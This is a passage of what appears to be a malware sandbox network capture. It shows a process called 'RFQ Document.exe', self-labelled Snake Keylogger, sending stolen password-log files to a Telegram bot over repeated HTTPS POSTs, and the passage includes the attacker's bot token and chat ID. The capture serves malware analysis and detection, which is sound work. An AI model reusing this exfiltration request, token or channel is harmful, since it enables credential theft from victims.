2021-09-28 05:58:30 UTC	68	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 61 66 36 30 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c7af6092Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:30 UTC	69	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:30 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:30 UTC	69	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12624,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808710,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.4	49820	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:30 UTC	70	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c7d58614 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:30 UTC	70	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 64 35 38 36 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c7d58614Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:30 UTC	71	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:30 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:30 UTC	71	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12625,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808710,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.4	49821	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:30 UTC	71	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c7f484a9 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:30 UTC	72	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 66 34 38 34 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c7f484a9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:31 UTC	72	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:31 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:31 UTC	72	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12626,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808711,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.4	49822	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:31 UTC	73	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c81aabf8 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:31 UTC	73	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 38 31 61 61 62 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c81aabf8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:31 UTC	74	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:31 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:31 UTC	74	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12627,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808711,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.4	49823	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:31 UTC	75	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c88d1ae7 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:31 UTC	75	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 38 38 64 31 61 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c88d1ae7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:32 UTC	75	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:32 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:32 UTC	76	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12628,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808712,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.4	49824	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:32 UTC	76	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c8b34098 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:32 UTC	77	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 38 62 33 34 30 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c8b34098Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:32 UTC	77	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:32 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:32 UTC	77	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12629,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808712,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.4	49825	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:32 UTC	78	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c8e08d43 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:32 UTC	78	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 38 65 30 38 64 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c8e08d43Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:32 UTC	79	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:32 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:32 UTC	79	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12630,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808712,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49779	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:21 UTC	7	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c27117cd Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:21 UTC	8	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 37 31 31 37 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c27117cdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
